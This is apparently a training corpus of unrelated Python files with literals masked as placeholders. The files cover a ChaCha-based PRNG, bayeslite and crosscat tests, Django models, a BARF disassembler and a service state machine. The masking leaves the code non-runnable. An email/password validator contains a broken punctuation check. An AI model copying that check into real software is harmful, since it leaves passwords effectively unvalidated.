for i in range ( nblocks ) : <EOL> chacha . core ( <NUM_LIT:8> , out , ctr , subkey , const32 ) <EOL> t = ctr [ <NUM_LIT:0> ] + <NUM_LIT:1> ; ctr [ <NUM_LIT:0> ] = t & <NUM_LIT> ; ctr [ <NUM_LIT:1> ] += t <EOL> buf [ start + <NUM_LIT:64> * i : start + <NUM_LIT:64> * ( i + <NUM_LIT:1> ) ] = struct . pack ( '<STR_LIT>' , * out ) <EOL> nextra = nbytes - <NUM_LIT:64> * nblocks <EOL> if <NUM_LIT:0> < nextra : <EOL> chacha . core ( <NUM_LIT:8> , out , ctr , subkey , const32 ) <EOL> buf [ start + <NUM_LIT:64> * nblocks : start + <NUM_LIT:64> * nblocks + nextra ] = struct . pack ( '<STR_LIT>' , * out ) [ <NUM_LIT:0> : nextra ] <EOL> subkey [ <NUM_LIT:0> : <NUM_LIT:8> ] = out [ <NUM_LIT:0> : <NUM_LIT:8> ] = out [ <NUM_LIT:8> : <NUM_LIT:16> ] = self . 
zero <EOL> def weakrandom_bytes ( self , n ) : <EOL> buf = bytearray ( n ) <EOL> self . weakrandom_bytearray ( buf , <NUM_LIT:0> , n ) <EOL> return bytes ( buf ) <EOL> def weakprng ( seed ) : <EOL> return WeakPRNG ( seed ) <EOL> if weakprng ( bytes ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT:32> ) ) ) . weakrandom64 ( ) != <NUM_LIT> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> nondeterministic_weakprng_local = threading . local ( ) <EOL> nondeterministic_weakprng_local . prng = None <EOL> def nondeterministic_weakprng ( ) : <EOL> if nondeterministic_weakprng_local . prng == None : <EOL> nondeterministic_weakprng_local . prng = weakprng ( os . urandom ( <NUM_LIT:32> ) ) <EOL> return nondeterministic_weakprng_local . prng <EOL> def nondeterministic_weakrandom32 ( ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom32 ( ) <EOL> def nondeterministic_weakrandom64 ( ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom64 ( ) <EOL> def nondeterministic_weakrandom_uniform ( n ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom_uniform ( n ) <EOL> def nondeterministic_weakrandom_bytearray ( buf , start , end ) : <EOL> return nondeterministic_weakprng ( ) . weakrandom_bytearray ( buf , start , end ) <EOL> def nondeterministic_weakrandom_bytes ( n ) : <EOL> return nondeterministic_weakprng ( ) . 
weakrandom_bytes ( n ) <EOL> nondeterministic_weakrandom32 ( ) <EOL> nondeterministic_weakrandom64 ( ) <EOL> nondeterministic_weakrandom_uniform ( <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT:16> ) , <NUM_LIT:3> , <NUM_LIT:8> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT> ) , <NUM_LIT:3> , <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT> ) , <NUM_LIT:3> , <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT> ) , <NUM_LIT:3> , <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytearray ( bytearray ( [ <NUM_LIT:0> ] * <NUM_LIT> ) , <NUM_LIT:3> , <NUM_LIT> ) <EOL> nondeterministic_weakrandom_bytes ( <NUM_LIT> ) </s>
<s> import json <EOL> import jsonschema <EOL> import pkgutil <EOL> class Validator ( object ) : <EOL> def __init__ ( self ) : <EOL> schema_json = pkgutil . get_data ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . schema = json . loads ( schema_json ) <EOL> def validate ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> jsonschema . validate ( obj , self . schema ) </s>
<s> import os <EOL> import pytest <EOL> import bayeslite <EOL> from bayeslite . metamodels . crosscat import CrosscatMetamodel <EOL> import bayeslite . read_csv as read_csv <EOL> import crosscat . LocalEngine <EOL> root = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> dha_csv = os . path . join ( root , '<STR_LIT>' ) <EOL> dha_models = os . path . join ( root , '<STR_LIT>' ) <EOL> dha_codebook = os . path . join ( root , '<STR_LIT>' ) <EOL> def test_legacy_models__ci_slow ( ) : <EOL> bdb = bayeslite . bayesdb_open ( builtin_metamodels = False ) <EOL> cc = crosscat . LocalEngine . LocalEngine ( seed = <NUM_LIT:0> ) <EOL> metamodel = CrosscatMetamodel ( cc ) <EOL> bayeslite . bayesdb_register_metamodel ( bdb , metamodel ) <EOL> with pytest . raises ( ValueError ) : <EOL> bayeslite . bayesdb_load_legacy_models ( bdb , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dha_models , create = True ) <EOL> with open ( dha_csv , '<STR_LIT>' ) as f : <EOL> read_csv . bayesdb_read_csv ( bdb , '<STR_LIT>' , f , header = True , create = True ) <EOL> bayeslite . bayesdb_load_legacy_models ( bdb , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dha_models , create = True ) <EOL> bdb . execute ( '<STR_LIT>' ) <EOL> bayeslite . bayesdb_load_codebook_csv_file ( bdb , '<STR_LIT>' , dha_codebook ) <EOL> bayeslite . bayesdb_load_codebook_csv_file ( bdb , '<STR_LIT>' , dha_codebook ) <EOL> bql = '''<STR_LIT>''' <EOL> with bdb . savepoint ( ) : <EOL> assert bdb . execute ( bql , ( '<STR_LIT>' , ) ) . fetchall ( ) == [ <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ] <EOL> bql = '''<STR_LIT>''' <EOL> with bdb . savepoint ( ) : <EOL> assert bdb . execute ( bql ) . 
fetchall ( ) == [ <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , ) , <EOL> ] </s>
<s> from __future__ import print_function <EOL> import numpy <EOL> import crosscat . cython_code . ContinuousComponentModel as CCM <EOL> import crosscat . cython_code . MultinomialComponentModel as MCM <EOL> import crosscat . cython_code . State as State <EOL> c_hypers = dict ( r = <NUM_LIT:10> , nu = <NUM_LIT:10> , s = <NUM_LIT:10> , mu = <NUM_LIT:10> ) <EOL> ccm = CCM . p_ContinuousComponentModel ( c_hypers ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( ccm ) <EOL> for element in [ numpy . nan , <NUM_LIT:0> , <NUM_LIT:1> , numpy . nan , <NUM_LIT:2> ] : <EOL> print ( ) <EOL> ccm . insert_element ( element ) <EOL> print ( "<STR_LIT>" % element ) <EOL> print ( ccm ) <EOL> m_hypers = dict ( dirichlet_alpha = <NUM_LIT:10> , K = <NUM_LIT:3> ) <EOL> mcm = MCM . p_MultinomialComponentModel ( m_hypers ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( mcm ) <EOL> for element in [ numpy . nan , <NUM_LIT:0> , <NUM_LIT:1> , numpy . nan , <NUM_LIT:2> ] : <EOL> print ( ) <EOL> mcm . insert_element ( element ) <EOL> print ( "<STR_LIT>" % element ) <EOL> print ( mcm ) </s>
<s> import pytest <EOL> import crosscat . tests . synthetic_data_generator as sdg <EOL> from crosscat . LocalEngine import LocalEngine <EOL> '''<STR_LIT>''' <EOL> N_ROWS = <NUM_LIT:1000> <EOL> def quick_le ( seed , n_chains = <NUM_LIT:1> ) : <EOL> cctypes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> distargs = [ None , None , dict ( K = <NUM_LIT:9> ) , dict ( K = <NUM_LIT:7> ) , None ] <EOL> cols_to_views = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> separation = [ <NUM_LIT> , <NUM_LIT> ] <EOL> cluster_weights = [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] <EOL> T , M_c , M_r = sdg . gen_data ( cctypes , N_ROWS , cols_to_views , cluster_weights , <EOL> separation , seed = seed , distargs = distargs , return_structure = True ) <EOL> engine = LocalEngine ( ) <EOL> X_L , X_D = engine . initialize ( M_c , M_r , T , seed , n_chains = n_chains ) <EOL> return T , M_r , M_c , X_L , X_D , engine <EOL> def test_simple_predictive_probability_observed ( ) : <EOL> pass <EOL> def test_simple_predictive_probability_unobserved ( seed = <NUM_LIT:0> ) : <EOL> T , M_r , M_c , X_L , X_D , engine = quick_le ( seed ) <EOL> Q = [ [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:0.5> ) ] , [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:1> ) ] ] <EOL> Y = [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS // <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( N_ROWS , <NUM_LIT:1> , <NUM_LIT:0.5> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> ] ) <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:0.5> ) ] <EOL> val = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> with pytest . 
raises ( AssertionError ) : <EOL> assert val [ <NUM_LIT:0> ] == <NUM_LIT:0> <EOL> Y = [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> val = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> ] ) <EOL> with pytest . raises ( AssertionError ) : <EOL> assert val [ <NUM_LIT:0> ] == <NUM_LIT:0> <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT> ) ] <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> Y = [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:4> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ) ] <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> ] ) <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ) ] <EOL> with pytest . raises ( IndexError ) : <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> Y = [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:4> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ) ] <EOL> with pytest . raises ( IndexError ) : <EOL> vals = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> ] ) <EOL> def test_predictive_probability_observed ( seed = <NUM_LIT:0> ) : <EOL> pass <EOL> def test_predictive_probability_unobserved ( seed = <NUM_LIT:0> ) : <EOL> T , M_r , M_c , X_L , X_D , engine = quick_le ( seed ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:10> , <NUM_LIT:2> ) ] <EOL> Y = [ ] <EOL> with pytest . raises ( ValueError ) : <EOL> vals = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS - <NUM_LIT:1> , <NUM_LIT:10> , <NUM_LIT:2> ) ] <EOL> Y = [ ] <EOL> with pytest . raises ( ValueError ) : <EOL> vals = engine . 
predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> Y = [ ] <EOL> with pytest . raises ( ValueError ) : <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> with pytest . raises ( Exception ) : <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) ] <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert val == - float ( '<STR_LIT>' ) <EOL> assert isinstance ( val , float ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert val == <NUM_LIT:0> <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> val_0 = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> val_1 = engine . predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> : ] ) <EOL> assert val_0 == val_1 <EOL> Q = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:0.5> ) ] <EOL> Y = [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS // <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( N_ROWS , <NUM_LIT:1> , <NUM_LIT:0.5> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> val_0 = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> val_1 = engine . 
simple_predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert val_0 == val_1 <EOL> Q = [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> Y = [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS // <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( N_ROWS , <NUM_LIT:1> , <NUM_LIT:0.5> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> val_0 = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> val_1 = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert val_0 == val_1 <EOL> Q = [ ( N_ROWS , <NUM_LIT:3> , <NUM_LIT:4> ) , ( N_ROWS , <NUM_LIT:4> , <NUM_LIT> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS , <NUM_LIT:1> , - <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert isinstance ( val , float ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS , <NUM_LIT:1> , - <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:3> , <NUM_LIT:4> ) , ( N_ROWS , <NUM_LIT:4> , <NUM_LIT> ) ] <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert isinstance ( val , float ) </s>
<s> import sys <EOL> def main ( ) : <EOL> filea = "<STR_LIT>" <EOL> a = open ( filea ) . readlines ( ) <EOL> al = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in a ] <EOL> aa = a + al <EOL> fileb = "<STR_LIT>" <EOL> b = open ( fileb ) . readlines ( ) <EOL> bl = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in b ] <EOL> bb = b + bl <EOL> filec = "<STR_LIT>" <EOL> c = open ( filec ) . readlines ( ) <EOL> cl = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in c ] <EOL> cc = c + cl <EOL> filed = "<STR_LIT>" <EOL> d = open ( filed ) . readlines ( ) <EOL> dl = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in d ] <EOL> dd = d + dl <EOL> thelist = list ( set ( aa ) & set ( bb ) & set ( cc ) & set ( dd ) ) <EOL> thelistusrlib = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in thelist ] <EOL> newlist = thelist + thelistusrlib <EOL> newlist . sort ( ) <EOL> return newlist <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> list = main ( ) <EOL> f = open ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> for line in list : <EOL> f . write ( line ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import string <EOL> REGEX_EXP = "<STR_LIT>" <EOL> PUNCTUATIONS = string . punctuation <EOL> def email_validator ( email ) : <EOL> """<STR_LIT>""" <EOL> if len ( email ) > <NUM_LIT:6> : <EOL> if re . match ( REGEX_EXP , email ) != None : <EOL> return True <EOL> return False <EOL> def password_validator ( password ) : <EOL> """<STR_LIT>""" <EOL> if list ( PUNCTUATIONS ) in password : <EOL> """<STR_LIT>""" <EOL> return False <EOL> else : <EOL> return True </s>
<s> from django . db import models <EOL> from django . contrib . auth . models import User <EOL> from cmdb . models import ConfigurationItem <EOL> class OrchestraClass ( models . Model ) : <EOL> Name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> Creator = models . ForeignKey ( User ) <EOL> Notes = models . TextField ( ) <EOL> AffectedItems = models . ManyToManyField ( ConfigurationItem ) <EOL> def __unicode__ ( self ) : <EOL> return self . Name <EOL> class Meta : <EOL> verbose_name = '<STR_LIT>' <EOL> verbose_name_plural = '<STR_LIT>' <EOL> ordering = [ '<STR_LIT:Name>' ] <EOL> class OrchestraMetaDataName ( models . Model ) : <EOL> Name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> def __unicode__ ( self ) : <EOL> return self . Name <EOL> class Meta : <EOL> verbose_name = '<STR_LIT>' <EOL> ordering = [ '<STR_LIT:Name>' ] <EOL> class OrchestraMetaDataValue ( models . Model ) : <EOL> Name = models . ForeignKey ( OrchestraMetaDataName ) <EOL> Value = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> AffectedItems = models . ManyToManyField ( ConfigurationItem ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . Name , self . Value ) </s>
<s> """<STR_LIT>""" <EOL> from capstone import * <EOL> from barf . arch import ARCH_X86_MODE_32 <EOL> from barf . arch import ARCH_X86_MODE_64 <EOL> from barf . arch . x86 . x86parser import X86Parser <EOL> from barf . core . disassembler import Disassembler <EOL> class X86Disassembler ( Disassembler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , architecture_mode = ARCH_X86_MODE_32 ) : <EOL> super ( X86Disassembler , self ) . __init__ ( ) <EOL> arch_mode_map = { <EOL> ARCH_X86_MODE_32 : CS_MODE_32 , <EOL> ARCH_X86_MODE_64 : CS_MODE_64 <EOL> } <EOL> self . _parser = X86Parser ( architecture_mode ) <EOL> self . _disassembler = Cs ( CS_ARCH_X86 , arch_mode_map [ architecture_mode ] ) <EOL> def disassemble ( self , data , address ) : <EOL> """<STR_LIT>""" <EOL> asm , size = self . _cs_disassemble_one ( data , address ) <EOL> instr = self . _parser . parse ( asm ) if asm else None <EOL> if instr : <EOL> instr . address = address <EOL> instr . size = size <EOL> instr . bytes = data [ <NUM_LIT:0> : size ] <EOL> return instr <EOL> def disassemble_all ( self , data , address ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _cs_disassemble_one ( self , data , address ) : <EOL> """<STR_LIT>""" <EOL> asm , size = "<STR_LIT>" , <NUM_LIT:0> <EOL> disasm = list ( self . _disassembler . disasm_lite ( data , address ) ) <EOL> if len ( disasm ) > <NUM_LIT:0> : <EOL> address , size , mnemonic , op_str = disasm [ <NUM_LIT:0> ] <EOL> asm = str ( mnemonic + "<STR_LIT:U+0020>" + op_str ) . strip ( ) <EOL> if asm in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> asm , size = "<STR_LIT>" , <NUM_LIT:0> <EOL> return asm , size </s>
<s> import os <EOL> import sys <EOL> from barf . barf import BARF <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> filename = os . path . abspath ( "<STR_LIT>" ) <EOL> barf = BARF ( filename ) <EOL> except Exception as err : <EOL> print err <EOL> print "<STR_LIT>" % filename <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> print ( "<STR_LIT>" ) <EOL> for addr , asm_instr , reil_instrs in barf . translate ( ) : <EOL> print ( "<STR_LIT>" . format ( addr , asm_instr ) ) <EOL> for reil_instr in reil_instrs : <EOL> print ( "<STR_LIT>" . format ( "<STR_LIT>" , reil_instr ) ) <EOL> try : <EOL> smt_exprs = barf . smt_translator . translate ( reil_instr ) <EOL> for smt_expr in smt_exprs : <EOL> print ( "<STR_LIT>" . format ( "<STR_LIT>" , smt_expr ) ) <EOL> except : <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import datetime <EOL> from django . utils . timezone import utc <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . DateField ( default = datetime . datetime ( <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT> , tzinfo = utc ) , auto_now_add = True ) , <EOL> preserve_default = False , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> import runpy <EOL> from . util import AbstractStateMachine <EOL> from . util import defaultproperty <EOL> from . import Setting <EOL> def require_ready ( func ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( func ) <EOL> def wrapped ( self , * args , ** kwargs ) : <EOL> try : <EOL> self . state . wait ( "<STR_LIT>" , self . ready_timeout ) <EOL> except Exception , e : <EOL> pass <EOL> if not self . ready : <EOL> raise RuntimeWarning ( "<STR_LIT>" ) <EOL> return func ( self , * args , ** kwargs ) <EOL> return wrapped <EOL> def autospawn ( func ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( func ) <EOL> def wrapped ( self , * args , ** kwargs ) : <EOL> self . spawn ( func , self , * args , ** kwargs ) <EOL> return wrapped <EOL> class ServiceStateMachine ( AbstractStateMachine ) : <EOL> """<STR_LIT>""" <EOL> initial_state = "<STR_LIT>" <EOL> allow_wait = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> event_start = [ "<STR_LIT>" , "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" <EOL> event_ready = [ "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" <EOL> event_stop = [ "<STR_LIT>" , "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" <EOL> event_stopped = [ "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" <EOL> class BasicService ( object ) : <EOL> _statemachine_class = ServiceStateMachine <EOL> _children = defaultproperty ( list ) <EOL> start_timeout = defaultproperty ( int , <NUM_LIT:2> ) <EOL> start_before = defaultproperty ( bool , False ) <EOL> def pre_init ( self ) : <EOL> pass <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> s = super ( BasicService , cls ) . __new__ ( cls , * args , ** kwargs ) <EOL> s . pre_init ( ) <EOL> s . state = cls . _statemachine_class ( s ) <EOL> return s <EOL> @ property <EOL> def service_name ( self ) : <EOL> return self . __class__ . __name__ <EOL> @ property <EOL> def ready ( self ) : <EOL> return self . state . 
current == '<STR_LIT>' <EOL> def add_service ( self , service ) : <EOL> """<STR_LIT>""" <EOL> self . _children . append ( service ) <EOL> def remove_service ( self , service ) : <EOL> """<STR_LIT>""" <EOL> self . _children . remove ( service ) <EOL> def start ( self , block_until_ready = True ) : <EOL> """<STR_LIT>""" <EOL> self . state ( "<STR_LIT:start>" ) <EOL> if self . start_before : <EOL> self . do_start ( ) <EOL> for child in self . _children : <EOL> if child . state . current not in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> child . start ( block_until_ready ) <EOL> if not self . start_before : <EOL> ready = not self . do_start ( ) <EOL> if not ready and block_until_ready is True : <EOL> self . state . wait ( "<STR_LIT>" , self . start_timeout ) <EOL> elif ready : <EOL> self . state ( "<STR_LIT>" ) <EOL> else : <EOL> self . state ( "<STR_LIT>" ) <EOL> def pre_start ( self ) : <EOL> pass <EOL> def do_start ( self ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def post_start ( self ) : <EOL> pass <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . state . current in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> return <EOL> ready_before_stop = self . ready <EOL> self . state ( "<STR_LIT>" ) <EOL> for child in reversed ( self . _children ) : <EOL> child . stop ( ) <EOL> if ready_before_stop : <EOL> self . do_stop ( ) <EOL> self . state ( "<STR_LIT>" ) <EOL> def pre_stop ( self ) : <EOL> pass <EOL> def post_stop ( self ) : <EOL> pass <EOL> def do_stop ( self ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def reload ( self ) : <EOL> def _reload_children ( ) : <EOL> for child in self . _children : <EOL> child . reload ( ) <EOL> if self . start_before : <EOL> self . do_reload ( ) <EOL> _reload_children ( ) <EOL> else : <EOL> _reload_children ( ) <EOL> self . do_reload ( ) <EOL> def do_reload ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def serve_forever ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . 
start ( ) <EOL> except RuntimeWarning , e : <EOL> pass <EOL> self . state . wait ( "<STR_LIT>" ) <EOL> def __enter__ ( self ) : <EOL> self . start ( ) <EOL> return self <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> self . stop ( ) <EOL> class Service ( BasicService ) : <EOL> async_available = [ "<STR_LIT>" + m for m in ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> async = Setting ( "<STR_LIT>" , default = "<STR_LIT>" , help = """<STR_LIT>""" ) <EOL> def pre_init ( self ) : <EOL> try : <EOL> mod = runpy . run_module ( self . async ) <EOL> self . async = mod [ '<STR_LIT>' ] ( ) <EOL> self . add_service ( self . async ) <EOL> except ( NotImplementedError , ImportError ) as e : <EOL> if self . async not in self . async_available : <EOL> helptext = ( "<STR_LIT>" <EOL> + "<STR_LIT>" . join ( self . async_available ) ) <EOL> elif self . async . endswith ( "<STR_LIT>" ) : <EOL> helptext = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> helptext = "<STR_LIT>" <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" . format ( self . async , <EOL> helptext ) ) <EOL> def spawn ( self , * args , ** kwargs ) : <EOL> return self . async . spawn ( * args , ** kwargs ) <EOL> def spawn_later ( self , * args , ** kwargs ) : <EOL> return self . async . spawn_later ( * args , ** kwargs ) </s>
